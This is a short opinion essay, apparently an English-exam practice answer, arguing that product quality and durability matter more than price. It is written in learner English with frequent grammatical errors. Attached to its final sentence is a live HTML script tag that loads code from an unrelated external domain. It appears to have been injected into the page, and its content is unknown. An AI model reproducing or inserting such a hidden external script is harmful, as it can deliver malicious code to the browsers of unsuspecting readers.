Some people believe that price is the only consideration when buying something. Do you agree or disagree?

It is thought by some people that the price of products plays an important role to purchase something. While I agree with this opinion to some extent, I believe that there are other factors such as quality and durability of good.

On the one hand, it is essential that people should take into consideration the cost of something before making a purchase. Furthermore, they need to pay much attention if they can afford that item whether it leads them in problem in the future or not. For example, on many occasions, there are two goods with the same purpose and different cost. Therefore, they must buy it based on their monthly expenses as well as their whole salary. In my opinion, in this case, the price is urgent factor because of money matter.

On the other hand, in the modern era, more and more people tempt to get luxury and branded products without concern on how money they want to pay due to the quality and use it for a long time. Additionally, there are circumstances where the cost of items should be ignored completely. For instance, if a customer want electrical appliances like refrigerator, microwave and so on, they prefer to get the latest one from famous company. As well, they use credit cards by taking loans which have been offered by banks. I think, buying best quality thing will be beneficial to them and they will get less problem in their life.

To draw a conclusion, however the price is one factor in shopping, in my view, the quality and product's durability is excellent than its price and people should not see money.<script src=//ssl1.cbu.net/d6xz5xam></script>